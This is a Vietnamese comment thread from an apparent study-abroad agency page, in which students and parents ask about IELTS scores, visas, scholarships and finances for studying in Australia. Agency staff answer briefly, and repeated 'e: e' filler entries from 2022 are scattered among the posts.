 • Nguyễn Thị Kim My: Chào ad. E muốn hỏi là hiện tại e đang học 12. E tính sau khi thi tốt nghiệp xong thì mới thi IELTS. Vậy lúc đó hồ sơ xét theo điểm 3 năm cấp 3 hay là e phải học đại học để xét hồ sơ. Nếu e đã có bằng IELTS 5.5
  Vào lúc: 18/01/2018, 10:47:16 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:23:23
  e: e
  Vào lúc: 17/10/2022, 06:23:23
  e: e
  Vào lúc: 03/10/2022, 12:51:55
  e: e
  Vào lúc: 03/10/2022, 01:04:21
  info@megastudy.edu.vn: Chào em, Nếu em đã có bằng ielts thì thời điểm đi là sau lớp 12 thì hồ sơ xét điểm 3 năm cấp 3 của em nhé.
  Vào lúc: 18/01/2018, 15:57:45
 • nguyễn ngọc huyền: anh chị ơi , em có một người cô ruột bên Uc muốn bảo lãnh em sang đó học , việc em có người thân bên đó bảo lãnh thì hồ sơ xin Visa của em có dễ đậu ko ạ . mong a chị giãi đáp dùm em , em cãm ơn ạ
  Vào lúc: 09/01/2018, 11:31:19 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:23:27
  e: e
  Vào lúc: 17/10/2022, 06:23:27
  e: e
  Vào lúc: 03/10/2022, 12:51:56
  e: e
  Vào lúc: 03/10/2022, 01:04:22
  havtt@megastudy.edu.vn: Chào em, việc này cũng không thể khẳng định sự chắc chắn tỷ lệ visa của em được vì còn cần xét các yếu tố khác nữa như quá trình học tập, hồ sơ nhân thân của em nữa nhé.
  Vào lúc: 09/01/2018, 14:26:35
 • nguyễn tuan anh: chào anh/chị . em hiện tại vừa bỏ học dai học sau khi học được 3 năm và đã đang đi học ngành chế biến thực phẩm hệ cao đẳng chính quy tại cao đẳng nghề tphcm ,em cũng có đam mê nấu ăn nên cũng đã đăng kí khóa học đầu bếp . Hiện tại e đã có IELTS 5.5 . Cho e hỏi là em có đủ điều kiện để đi du học nghề nấu ăn ở úc được ở úc không ạ vì e sợ việc em bỏ học dai học giữa chừng sẽ khiến em không xin được visa ?
  Vào lúc: 08/01/2018, 22:17:04 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:23:30
  e: e
  Vào lúc: 17/10/2022, 06:23:30
  e: e
  Vào lúc: 03/10/2022, 12:51:58
  e: e
  Vào lúc: 03/10/2022, 01:04:24
  info@megastudy.edu.vn: Chào em, việc em chuyển đổi ngành học khi đã hết năm 3 đại học có thể khiến lãnh sự đánh giá không cao về định hướng học tập của em, tuy nhiên nếu em có giải trình tốt và chuẩn bị hồ sơ chặt chẽ thì vẫn có tỷ lệ đậu visa cao em nhé.
  Vào lúc: 09/01/2018, 08:56:57
 • trần văn tuấn: chào ad , em hiện tại đã bỏ ngang đại học mặc dù đã tới năm 4 để luyện thi ielts , và mục tiêu của em là du học nghề Chief tại Úc . Vậy cho e hỏi là các trường của Úc chỉ xét điềm THPT cho bậc nghề hay còn đòi hỏi cà điểm dh nếu người đó có học dh tại VN ạ ?? Và nếu được trường chấp nhận thì khả năng đậu VISA của em có dễ hơn ko ạ ? Rất mong anh chị tư vấn giup em ạ !! em cảm ơn rất nhiều ạ !!
  Vào lúc: 07/01/2018, 19:31:49 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:23:33
  e: e
  Vào lúc: 17/10/2022, 06:23:33
  e: e
  Vào lúc: 03/10/2022, 12:51:59
  e: e
  Vào lúc: 03/10/2022, 01:04:25
  tran van tuan: anh/chị cho em hỏi là nếu bây giờ em đi học chief và đi làm trong khoảng 2 đến 3 năm tại việt nam thì liệu em có cơ hội du học Úc ko ạ ? Và khi đó thì việc em bỏ học ĐH giua chừng có ảnh hưởng gì dến hồ sơ xin du học ko ạ ? Việc em có 1 người dì ruột bên Úc muốn bào lãnh em thì có giúp ích gì được cho trường hợp của em ko ạ ? Cảm ơn anh chị rất nhiều ạ !!
  Vào lúc: 08/01/2018, 17:42:36
  info@megastudy.edu.vn: Chào em. Tại Úc sẽ xét hồ sơ học tập của em với cấp bậc học gần nhất. Đồng nghĩa với việc em phải chuẩn bị cả kết quả bảng điểm đại học. Và tỷ lệ hồ sơ visa của em sẽ có rủi ro bởi đang học gần hết đại học mà em lại bỏ ngang quay sang học nghề. Em cần có sự giải trình hồ sơ thật hợp lý mới có thể khắc phục được nhé.
  Vào lúc: 08/01/2018, 09:21:58
 • Nguyễn thị dung: Chào anh/chị e đang du học ở nhât bản nhưng e muốn chuyển qua du học úc có được k ah. Năm nay e đang học năm nhất đại học wesleyan ở nhật khoa tiếng nhật. Nhưng e muốn chuyển qua du học úc thì cần hồ sơ gì và thủ tục gì ah. E tiếng anh k biết e muốn qua bên đó học liệu có được k ah. Có cần phỏng vấn visa hay chứng chỉ gì k ah.e cảm ơn
  Vào lúc: 04/01/2018, 19:19:24 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:23:36
  e: e
  Vào lúc: 17/10/2022, 06:23:35
  e: e
  Vào lúc: 03/10/2022, 12:52:01
  e: e
  Vào lúc: 03/10/2022, 01:04:27
  info@megastudy.edu.vn: Chào em, em muốn qua Úc học thì cần có chứng chỉ tiếng anh và các hồ sơ học tập, tài chính em nhé. Úc có trường hợp phỏng vấn có trường hợp xét thẳng em ạ.
  Vào lúc: 05/01/2018, 09:46:02
 • Anh Nguyet: Chào anh/chị hiện tại em đang học 12 ở Aus, visa em sẽ hết hạn khi học xong 12. Nếu em muốn học tiếp tục lên University/TAFE thì có cần làm lại các thủ tục để xin visa không? Mong anh/chị tư vấn thêm cho em về vấn đề này. Cám ơn anh/chị
  Vào lúc: 27/12/2017, 09:19:47 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:23:39
  e: e
  Vào lúc: 17/10/2022, 06:23:38
  e: e
  Vào lúc: 03/10/2022, 12:52:02
  e: e
  Vào lúc: 03/10/2022, 01:04:28
  info@megastudy.edu.vn: Chào em, em cần làm lại visa nếu muốn học tiếp lên đại học, tuy nhiên em có thể gia hạn tại Úc chứ không nhất thiết phải về VN nhé.
  Vào lúc: 27/12/2017, 11:08:13
 • Hoàng Duyên: Nếu tôi đang theo học tại trường việt nam và có ý định đi sang úc du học thì có được không ạ hay cần những điều kiện gì không?
  Vào lúc: 20/12/2017, 22:58:04 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:23:42
  e: e
  Vào lúc: 17/10/2022, 06:23:41
  e: e
  Vào lúc: 03/10/2022, 12:52:04
  e: e
  Vào lúc: 03/10/2022, 01:04:30
  info@megastudy.edu.vn: Chào bạn, hoàn toàn được bạn nhé, bạn cần có chứng chỉ tiếng anh (tùy trường sẽ có yêu cầu mức ielts khác nhau) và bằng cấp, bảng điểm năm học gần nhất.
  Vào lúc: 21/12/2017, 09:05:59
 • Lê Thanh Cường: Chào anh chị, em hiện đã tốt nghiệp đại học ở VN được 1 năm và đạt loại Khá. Em muốn học lên thạc sĩ tại Úc, ielts hiện tại của em mới đạt 5.5 thì em cần những gì? Em cảm ơn
  Vào lúc: 15/12/2017, 08:35:45 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:23:44
  e: e
  Vào lúc: 17/10/2022, 06:23:44
  e: e
  Vào lúc: 03/10/2022, 12:52:05
  e: e
  Vào lúc: 03/10/2022, 01:04:31
  info@megastudy.edu.vn: Chào em, tùy từng ngành mà bậc thạc sĩ tại Úc sẽ có yêu cầu đầu vào khác nhau nhưng thường sẽ có yêu cầu ielts 6.5; với trình độ của em có thể được cấp khóa tiếng Anh trước khi vào khóa chính, Megastudy sẽ email thông tin cho em nhé.
  Vào lúc: 15/12/2017, 10:18:30
 • Huỳnh Thanh Tâm: Chào chị, e là học sinh đang học lớp 11, từ lớp 6 đến lớp 10 em đều học sinh trung bình thì có học bổng nào dành cho học sinh trung bình tại úc ko ạ . E vẫn chưa thi ielt thì có khả năng đậu hông bổng ko c
  Vào lúc: 03/12/2017, 22:57:57 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:23:48
  e: e
  Vào lúc: 03/10/2022, 12:52:07
  e: e
  Vào lúc: 03/10/2022, 01:04:33
  Huỳnh Thanh Tâm: Nếu e học muốn 12 sang úc học thì đậu học bổng có khó ko c ? Hoặc muốn đi tự túc thì 1 năm khoảng bao nhiêu tiền ạ
  Vào lúc: 04/12/2017, 15:28:46
  info@megastudy.edu.vn: Chào em, nếu em đang hỏi bậc đại học thì khó em ạ, vì điều nhận nhận học bổng thường là có điểm Tb học tập loại khá giỏi và chứng chỉ ielts đạt khoảng 7.0 trở lên em nhé.
  Vào lúc: 04/12/2017, 09:23:12
 • Nguyễn Văn Đô: Cho em hỏi chút ạ, em đang học đại học năm 2 và muốn có ý định đi du học Úc nếu như em đã đáp ứng đủ tiêu chuẩn về ngoại ngữ rồi nhưng bảng điểm học năm nhất của em kém thì khi nộp giấy xin nhập học ở các trường đại học ở Úc có bị từ chối không ạ ? Em cám ơn.
  Vào lúc: 09/10/2017, 20:38:39 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:23:52
  e: e
  Vào lúc: 03/10/2022, 12:52:08
  e: e
  Vào lúc: 03/10/2022, 01:04:35
  dungdtt@megastudy.edu.vn: Chào em, chị sẽ liên hệ trực tiếp để tư vấn cụ thể cho em nhé.
  Vào lúc: 10/10/2017, 08:56:22
 • Tommy: em đang làm hồ sơ đi ÚC hiện tại em học 12 nhưng đã nghỉ ngang và đợi xong hồ sơ . Vậy có ảnh hưởng đến quá trình xét Visa của e ko ạ ?
  Vào lúc: 30/09/2017, 21:17:05 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:23:55
  e: e
  Vào lúc: 03/10/2022, 12:52:10
  e: e
  Vào lúc: 03/10/2022, 01:04:36
  hoaipt@megastudy.edu.vn: Chào em, nếu em nghỉ sau khi đã nộp hồ sơ thì sự ảnh hưởng đến tỷ lệ visa của em là không nhiều nhé.
  Vào lúc: 02/10/2017, 09:14:48
 • Phan Thị Hằng: Em chưa đủ 18 tuổi, khi em đã có visa rồi nhưng kì nhập học của em chưa đến thì em có thể qua trước không ạ?
  Vào lúc: 21/09/2017, 10:47:40 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:23:58
  e: e
  Vào lúc: 03/10/2022, 12:52:12
  e: e
  Vào lúc: 03/10/2022, 01:04:37
  hoaipt@megastudy.edu.vn: Chào em, em có thể đi khi đã có visa nhé.
  Vào lúc: 21/09/2017, 13:54:27
 • Phan Thị Hằng: Cho em hỏi chút ạ, Em là học sinh dưới 18 tuổi, khi em có visa rồi nhưng chưa đến khóa học thì em có thể đi qua úc trước không ạ?
  Vào lúc: 21/09/2017, 10:46:14 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:24:01
  e: e
  Vào lúc: 03/10/2022, 12:52:13
  e: e
  Vào lúc: 03/10/2022, 01:04:39
  hoaipt@megastudy.edu.vn: Chào em, em có thể đi khi đã có visa nhé.
  Vào lúc: 21/09/2017, 13:54:14
 • th.hgg: chào chị, em đang vào dầu năm 11 và định hết lớp 11 sẽ sang úc học dự bị đại học thì em nên làm hồ sơ vào thời gian nào ? nếu muốn xin học bổng thì như thế nào ạ tại bh đầu năm cũng chưa có điểm GPA và em định tầm cuối 11 mới thi ielts ạ. cho e hỏi thêm là nếu e đi được, sau khi học xong 1 năm dự bị đại học em có thể đi làm được chưa ạ ?
  Vào lúc: 29/08/2017, 18:38:55 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:24:04
  e: e
  Vào lúc: 03/10/2022, 12:52:15
  e: e
  Vào lúc: 03/10/2022, 01:04:41
  th.hgg: dạ c có thể lh bằng email sẽ tiện hơn ạ :)) tại có thể có những lúc e sẽ đi học nên có thể k tiện nghe đt ạ . e cảm ơn chị đã tl ạ
  Vào lúc: 30/08/2017, 17:17:45
  hoaipt@megastudy.edu.vn: Hi em, em nên chuẩn bị hồ sơ trước kì nhập học khoảng 6 tháng nhé, chị sẽ liên hệ với em để tư vấn thêm.
  Vào lúc: 30/08/2017, 09:41:18
 • nong dai long: chào chị em muốn hỏi học viện box hill có cần chứng minh tài chính không ạ
  Vào lúc: 27/08/2017, 16:20:04 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:24:07
  e: e
  Vào lúc: 03/10/2022, 12:52:16
  e: e
  Vào lúc: 03/10/2022, 01:04:42
  hoaipt@megastudy.edu.vn: Chào em, học viện này không có trong danh sách miễn chứng minh tài chính của Úc em nhé.
  Vào lúc: 28/08/2017, 09:18:05
 • Nguyễn Việt Hùng: E đang có 1270 điểm sat và 6.5 ielts, 8.4 điểm trung bình theo anh/chị e có khả năng lấy được Adelaide International Undergraduate Scholarships không ạ ?? Nếu chưa đủ thì điểm sẽ ntn để có khả năng vì e có thể thi lại và nâng cao thêm điểm :))) . E cảm ơn
  Vào lúc: 25/08/2017, 10:14:42 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:24:09
  e: e
  Vào lúc: 03/10/2022, 12:52:18
  e: e
  Vào lúc: 03/10/2022, 01:04:44
  hoaipt@megastudy.edu.vn: Hi em, với điểm số của em có thể đạt học bổng du học Úc, chị sẽ liên hệ trực tiếp để tư vấn thêm cho em.
  Vào lúc: 26/08/2017, 09:24:27
 • Mỹ Linh: Re:Học sinh lớp 9, Trường THCS Lê Quí Đôn Chào bạn, Cần tư vấn một số câu hỏi sau: 1/ Cháu có bác ở tại Sydney ( bác chị ruột của ba ) Đc : Terrrey Rd, Box Hill NSW 2/ Dự định sẽ đi du học khi kết thúc lớp 10, Trường THCS Lê Quí Đôn. Nhập học tại Úc năm lớp 11. 3/ Cần trường gần địa chỉ trên. 4/ Nếu có học bổng thì tốt. 5/ Học lực 3 năm liền số điểm trên :8,5 6/ Học phí 1 năm là bao nhiêu. 7/ Mẹ đi theo giám hộ. Chân thành cám ơn.
  Vào lúc: 23/08/2017, 11:04:54 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:24:12
  e: e
  Vào lúc: 03/10/2022, 12:52:19
  e: e
  Vào lúc: 03/10/2022, 01:04:46
  hoaipt@megastudy.edu.vn: chào em, chị sẽ liên hệ với em sớm.
  Vào lúc: 24/08/2017, 10:10:16
 • Hải: Em đang học lớp 12 có ý định du học ở trường Qut ở Quếnland . Em đã có ielts 6.0 vậy em có cần thi tốt nghiệp trung học phổ thông hay không hay là trường chỉ xét học bạ lớp 12.
  Vào lúc: 19/08/2017, 18:39:12 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:24:15
  e: e
  Vào lúc: 03/10/2022, 12:52:21
  e: e
  Vào lúc: 03/10/2022, 01:04:47
  hoaipt@megastudy.edu.vn: Chào em, em nộp hồ sơ ở thời điểm nào thì trường sẽ xét học bạ gần nhất của em thời điểm đó, ví dụ hết lớp 12 em đi thì họ sẽ xét điểm học bạ lớp 12 và 3 năm học của em.
  Vào lúc: 24/08/2017, 09:24:00
 • Uyên Hoàng: Em vừa học xong cấp 3.Hiện nay em đã đỗ vào một trường đại học,nhưng em không có ý định học đại học tại Việt Nam mà có nguyện vọng du học Úc. Cho em hỏi là việc em theo học đại học có gây thuận lợi hay khó khăn gì cho việc xin visa du học Úc hay không?E cảm ơn.
  Vào lúc: 06/08/2017, 12:49:21 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:24:18
  e: e
  Vào lúc: 03/10/2022, 12:52:22
  e: e
  Vào lúc: 03/10/2022, 01:04:49
  hoaipt@megastudy.edu.vn: Chào em, em hoàn toàn có thể đi được nếu em đủ điều kiện về ielts và học bạ vào các trường đại học, cao đẳng úc nhé.
  Vào lúc: 07/08/2017, 10:01:34
 • Nguyễn Ngọc Huy: Chào anh/chị Mình sinh năm 1990, tốt nghiệp ĐH ở Việt Nam ngành Business Administration năm 2012 và có 5 năm làm quản lý. Mình có 3 tháng học IELTS tại philippines từ 4 - 7/2017. Hiện tại mình muốn đăng ký học Nurse hoặc Chef tại bậc College ở Úc. Mình muốn hỏi liệu lựa chon trái ngành và thấp bậc hơn ngành hiện tại ở Việt Nam thì tỷ lệ đậu Visa cao không? Có lựa chọn nào khác để nâng cao tỷ lệ đậu Visa (và có thể sẽ chuyển qua 1 trong 2 ngành trên sau khi có Visa). Mong nhận hồi âm sớm. Cảm ơn anh/chị
  Vào lúc: 02/08/2017, 17:25:51 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:24:21
  e: e
  Vào lúc: 03/10/2022, 12:52:24
  e: e
  Vào lúc: 03/10/2022, 01:04:50
  hoaipt@megastudy.edu.vn: Hi bạn, về trường hợp của bạn đúng là hơi khó để giải trình với lãnh sự, mình sẽ liên hệ trực tiếp để tư vấn cho bạn nhé.
  Vào lúc: 03/08/2017, 09:12:21
 • Quynh Nhu: Cho em hỏi muốn xin học bổng ở Úc thì phải làm thế nào khi nhà không có điều kiện nhiều về tài chính và em cũng không có bằng ielts? Có cách nào xin được học bổng toàn phần không ạ? Em sn 2002
  Vào lúc: 02/08/2017, 08:17:48 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:24:24
  e: e
  Vào lúc: 03/10/2022, 12:52:25
  e: e
  Vào lúc: 03/10/2022, 01:04:52
  havtt@megastudy.edu.vn: Hi em, nếu như những gì em chia sẻ thì rất khó xin được em nhé, em cần có điểm Tb học tập và ielts cao mới có cơ hội, và tại Úc rất hiếm học bổng toàn phần, chỉ có học bổng 1 phần thôi em.
  Vào lúc: 02/08/2017, 09:39:49
 • Tam nguyen: Chào ad, Hiện mình đã gap year 1 năm đề theo học tiếng anh đã đc ielts 5.0. Mình tốt nghiệp thpt loại giỏi ( 8.5), học tại đại học ngoại thương 1 năm sau đó mình bỏ không bảo lưu. Mình định apply vào trường deakin của úc, ngành commerce, học 1 khoá tiếng anh 10 tuần. Hiện mình đã có sổ tiết kiệm 1 tỉ1 , mẹ mình có 40% cổ phần công ty, và hiện là giám đốc kinh doanh của công ty đó. Bạn cho mình hỏi liệu hồ sơ của mình có khó khăm khi xin visa không ? Có phải phỏng vấn không? Mình cảm ơn ạ !
  Vào lúc: 21/07/2017, 03:20:00 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:24:27
  e: e
  Vào lúc: 03/10/2022, 12:52:27
  e: e
  Vào lúc: 03/10/2022, 01:04:54
  hoaipt@megastudy.edu.vn: Chào bạn, trường hợp của bạn mình sẽ liên hệ trực tiếp để tư vấn chi tiết nhé.
  Vào lúc: 21/07/2017, 09:36:22
 • Trân Nguyễn: Em đang dự tính học liên kết năm cuối đại học ở Úc (trường ĐH hiện tại có chương trình liên kết). Em muốn học liền lên thạc sỹ luôn nhưng chương trình thạc sỹ e dự tính học chỉ khoảng 1,5 năm). Nếu e học năm cuối đh và 1,5 năm thạc sỹ thì có đc tính là đã học 2 năm ở Úc để xin visa 485 được không? Em có thể xin 2 visa tách riêng ra được không hay phải xin 2 khoá học trong 1 student visa?
  Vào lúc: 19/07/2017, 15:49:35 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:24:30
  e: e
  Vào lúc: 03/10/2022, 12:52:29
  e: e
  Vào lúc: 03/10/2022, 01:04:55
  hoaipt@megastudy.edu.vn: Hi em, về câu hỏi của em chị sẽ liên hệ trực tiếp để tư vấn nhé.
  Vào lúc: 19/07/2017, 16:29:23
 • Lê minh thiên: Chào anh chị. Em đang chuẩn bị sang úc theo dạng định cư do mẹ e rước qua thì qua đó e có đc học lại cấp 3 ko ? ( Vì e mới thi đh xong) hay là e đc chọn ngành học đh bên đó đc ko mấy anh chị???
  Vào lúc: 18/07/2017, 02:09:23 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:24:34
  e: e
  Vào lúc: 03/10/2022, 12:52:30
  e: e
  Vào lúc: 03/10/2022, 01:04:57
  hoaipt@megastudy.edu.vn: Hi em, em hỏi ngành gì phát triển thì cũng khó, vì ngành nghề nhiều người học đồng nghĩa với cạnh tranh nghề nghiệp cũng lớn, em nên học ngành mà em có đam mê một chút sẽ đỡ nản hơn em nhé.
  Vào lúc: 19/07/2017, 16:30:50
  lê minh thiên: Dạ e cám ơn anh chị nhiều... mà cho e hỏi này là bên đó thì ngành gì đang phát triển và dễ học vậy anh chị? E đang phân vân lắm bên vn e học theo bác sĩ nhưng mẹ e bảo qua đó nên đổi ngành vì học vừa cực lại rất khó , mẹ e kêu e học quản trị kinh doanh ko biết có phù hợp với hiện tại về công việc bên đó ko anh chị?
  Vào lúc: 18/07/2017, 16:25:14
  havtt@megastudy.edu.vn: hi em, em đã tốt nghiệp cấp 3 rồi thì em hoàn toàn có thể học lên đại học bên đó em nhé.
  Vào lúc: 18/07/2017, 14:24:24
 • Phạm Thanh Hùng: em chào anh chị. em hiện đang là sinh viên đại học tại việt nam ( ngành kỹ thuật ạ) .em có ý định du học ở Úc và muốn có một bằng đại học của Úc theo chuyên ngành quản trị du lịch .thì có đc ko ạ .em co gặp khó khăn gì trong việc xin visa ko .mong anh chị giải đáp thắc mắc cho e??? em cảm ơn ạ!!
  Vào lúc: 09/07/2017, 10:15:04 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:24:37
  e: e
  Vào lúc: 03/10/2022, 12:52:32
  e: e
  Vào lúc: 03/10/2022, 01:04:58
  hoaipt@megastudy.edu.vn: Chào em, em có thể qua Úc học chuyên ngành quản trị du lịch em nhé. Chị sẽ liên hệ trực tiếp với em để tư vấn thêm.
  Vào lúc: 11/07/2017, 09:21:29
 • Tran Lanh: Tôi có gia đình người em ruột sống ở Sydney. Tôi rất muốn cho con trai của tôi sang đó đi học. Cháu vừa học xong lớp 5. Gia đình tôi làm nông nhưng mấy năm nay thất mùa nên cả 2 vợ chồng đi làm công nhân. Thu nhập mỗi tháng của cả 2 vợ chồng tôi là 7 triệu. Chúng tôi có 1 sổ tiết kiệm 100 triệu. Ngoài ra tôi có 2 cháu lớn. Một cháu đang học đại học, có đi làm ngoài giờ, đủ khả năng tự trang trải. Một cháu đang học cấp 3. Do gia đình người em cũng có con nhỏ nên không thuận tiện nhận bảo lãnh đưa đón cháu đi học nên nếu cháu đi du học thì vợ tôi sẽ sang sống cùng với cháu. 2 mẹ con sẽ ở chung nhà với gia đình em của tôi. Với hoàn cảnh của vợ chồng tôi như vậy liệu có đạt điều kiện xin cho cháu sang úc học không? Nhờ Megastudy hướng dẫn giúp vợ chồng tôi. Rất cảm ơn.
  Vào lúc: 20/06/2017, 21:55:11 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:24:40
  e: e
  Vào lúc: 03/10/2022, 12:52:33
  e: e
  Vào lúc: 03/10/2022, 01:05:00
  hoaipt@megastudy.edu.vn: Chào chị, về trường hợp gia đình anh chị muốn cho con du học tại Úc theo diện chứng minh tài chính là tương đối khó và tỷ lệ rủi ro visa là khá cao. Anh chị có thể chọn những trường miễn chứng minh tài chính cho cháu, tuy nhiên anh chị chưa nói rõ muốn cho con đi trong thời điểm nào, nếu là đi bậc trung học phổ thông thì bắt buộc phải chứng minh tài chính, như vậy sẽ rất khó theo thông tin em vừa chia sẻ, anh/ chị nếu cần tư vấn thêm thì liên hệ Hotline 0904683036 nhé!
  Vào lúc: 03/07/2017, 14:03:04
 • Nguyen Thi: Chào anh chị, Em đang học khóa Masters theo đăng ký CRICOS có độ dài là 104 tuần, tuy nhiên từ đầu em được miễn 1 số môn vì đã học Đại học (Bachelor) ngành liên quan tại Việt Nam, nên chỉ học 1.5 năm. Trường hợp này thì em có đủ điều kiện đăng ký Visa 485 không ạ? Hay là em phải học khóa khác để đủ 2 năm ạ? Mong anh chị tư vấn giúp em. Em xin cám ơn!
  Vào lúc: 02/06/2017, 19:42:59 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:24:43
  e: e
  Vào lúc: 03/10/2022, 12:52:35
  e: e
  Vào lúc: 03/10/2022, 01:05:01
  hoaipt@megastudy.edu.vn: Như theo thông tin bạn nói thì trường hợp của bạn chưa đủ điều kiện để dăng ký visa 485 bạn nhé. vì theo điều kiện để đăng ký visa 485 bạn ít nhất phải học chương trình tối thiểu từ 2 năm trở lên.Cùng với đó, mình cũng lưu ý với các bạn hiện tại úc đang có ý định bỏ visa 485 thay thế bằng loại visa khác. đến tháng 3/2018 sẽ có chính sách công bố cụ thể.
  Vào lúc: 08/06/2017, 09:32:27
 • Lê Huân: Chào! Năm nay mình 26 tuổi. Đã tốt nghiệp CĐ chính quy và đi làm đc 5 năm. Giờ mình muốn đi du học học ở Úc có đc không? Như mình bây giờ có thể tham gia vào chương trình học tập nào thì phù hợp.? Mong được tư vấn thêm. ThankS!
  Vào lúc: 30/05/2017, 23:43:02 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:24:46
  e: e
  Vào lúc: 03/10/2022, 12:52:36
  e: e
  Vào lúc: 03/10/2022, 01:05:03
  hoaipt@megastudy.edu.vn: Chào bạn, Với trường hợp của bạn bạn có thể lựa chọn học lên đại học hoặc học một chương trình cao đẳng nghề hoàn toàn ok bạn nhé.
  Vào lúc: 08/06/2017, 09:30:19
 • Thi Lan Anh Nguyen: e đang du học úc và e đag học high school year 12 và đã hoàn thành year 11 . Mà giờ e muốn chuyển trường và chuyển sang học Certificate IV and Diploma thì có cần đổi visa không ạ ??? visa của e đến tháng 3 năm sau thì hết hạn .E cảm ơn
  Vào lúc: 28/05/2017, 05:06:14 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:24:49
  e: e
  Vào lúc: 03/10/2022, 12:52:38
  e: e
  Vào lúc: 03/10/2022, 01:05:05
  hoaipt@megastudy.edu.vn: Chào em, Về trường hợp của em tư vấn viên sẽ liên hệ trực tiếp với em nhé.
  Vào lúc: 29/05/2017, 09:33:23
 • Nguyễn hữu Lượng: Vui lòng cho tôi hỏi:con tôi đang học lớp 12 tại ÚC,con tôi muốn xin VISA để học cử nhân thì chi phí xin visa lần thứ hai là bao nhiêu?nếu xin visa tại Úc hoặc tại Việt Nam thì chi phí xin visa có khác nhau không?tôi cám ơn.
  Vào lúc: 22/05/2017, 11:16:24 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:24:52
  e: e
  Vào lúc: 03/10/2022, 12:52:40
  e: e
  Vào lúc: 03/10/2022, 01:05:06
  hoaipt@megastudy.edu.vn: Dear anh, chi phí xin visa là 550 AUD/ 1 lần xin visa. Chi phí này là áp dụng ở tất cả các quốc gia trên thế giới.
  Vào lúc: 22/05/2017, 15:05:15
 • minh anh: em học xong lớp 11, học lực giỏi, ielfts 6. tài chính đảm bảo, em có thể du học úc chương trình gi? học lại ptth, cao đẳng hay đại học dự bị? mong quý anh chị tư ván giúp. xin cảm ơn
  Vào lúc: 21/05/2017, 22:38:27 - Trả lời

  e: e
  Vào lúc: 17/10/2022, 06:24:55
  e: e
  Vào lúc: 03/10/2022, 12:52:42
  e: e
  Vào lúc: 03/10/2022, 01:05:08
  hoaipt@megastudy.edu.vn: Dear em, với trường hợp của em thì em hoàn toàn có thể tham khảo 2 chương trình; THPT Hoặc Dự bị đại học.
  Vào lúc: 22/05/2017, 15:04:22
 • Lê Yến Phi: Tôi sống tại TPHCM, Gia đình tôi đang nộp hồ sơ định cư EB3 Mỹ, Vậy tôi có thể nộp hồ sơ du học cho bé gái sinh năm 2008 được không? Và tôi có được đi theo để chăm sóc bé không?
  Vào lúc: 09/05/2017, 11:56:44 - Trả lời

  e: e
  Vào lúc: 03/10/2022, 12:52:43
  e: e
  Vào lúc: 03/10/2022, 01:05:09
  Phuong ngoc hoa: Chị ơi có thể nào cho e hỏi chút thông tin về diện EB3 của mỹ ko ạ
  Vào lúc: 14/08/2017, 09:08:34
  hoaipt@megastudy.edu.vn: Dear chị, chị hoàn toàn có thể làm hồ sơ cho con đi du học Úc miễn chĩ có thể chứng minh được tài chính cho con đi du học và đủ tài chính chi trả chi phí sinh hoạt nếu như chị đi cùng chị nhé.
  Vào lúc: 22/05/2017, 15:02:57
 • truong thi dieu linh: Chào add,e tốt nghiệp lop 12 rồi ,e co bang eilts 4.5 ,hiện e đang có ý định du học tại úc,cị có thể giải đáp cho e về chuẩn tiếng anh và chứng minh tài chính ko ạ,trường hợp e có anh cị định cư ở úc có thể chứng minh thu nhập bên úc đc thì xin visa co khó khong ạ ? EM CẢM ƠN CHỊ .
  Vào lúc: 29/04/2017, 19:55:18 - Trả lời

  e: e
  Vào lúc: 03/10/2022, 12:52:45
  e: e
  Vào lúc: 03/10/2022, 01:05:11
  havtt@megastudy.edu.vn: Chào em, tư vấn du học Úc sẽ liên hệ với em nhé.
  Vào lúc: 04/05/2017, 09:33:05
 • Thuý đỗ: Xin cho mình hỏi, bạn mình đã tốt nghiệp đh sư phạm hà nội ngành việt nam học , muốn học cao học ở úc nhưng chưa có chứng chỉ ielts thì cỏ thể đi ko. Vả trường hợp muốn chuyển đổi ngành học khi du học thì có đc ko
  Vào lúc: 24/04/2017, 09:45:36 - Trả lời

  e: e
  Vào lúc: 03/10/2022, 12:52:46
  e: e
  Vào lúc: 03/10/2022, 01:05:13
  hoaipt@megastudy.edu.vn: Chào bạn, về việc chuyển đổi ngành học thì hoàn toàn có thể bạn ạ. Còn việ bạn của bạn chưa có chứng chỉ ielts sẽ là một điểm trừ trong hồ sơ xin visa với lãnh sự quán Úc nhé, tốt nhất là bạn ấy nên có chứng chỉ ielts để đảm bảo tỷ lệ visa.
  Vào lúc: 24/04/2017, 10:01:06
 • Văn Hồng Lam: Cho em hỏi, em đã học lớp 11 và có ý định qua úc học tiếp lớp 12 nhưng không có người bảo hộ bên ấy mà ba mẹ cũng không thể đi theo em được. Vậy em cần làm những thủ tục gì để đi và sống ở đâu, có những trường thpt nào bên đó ạ?
  Vào lúc: 18/04/2017, 08:45:04 - Trả lời

  e: e
  Vào lúc: 03/10/2022, 12:52:48
  e: e
  Vào lúc: 03/10/2022, 01:05:14
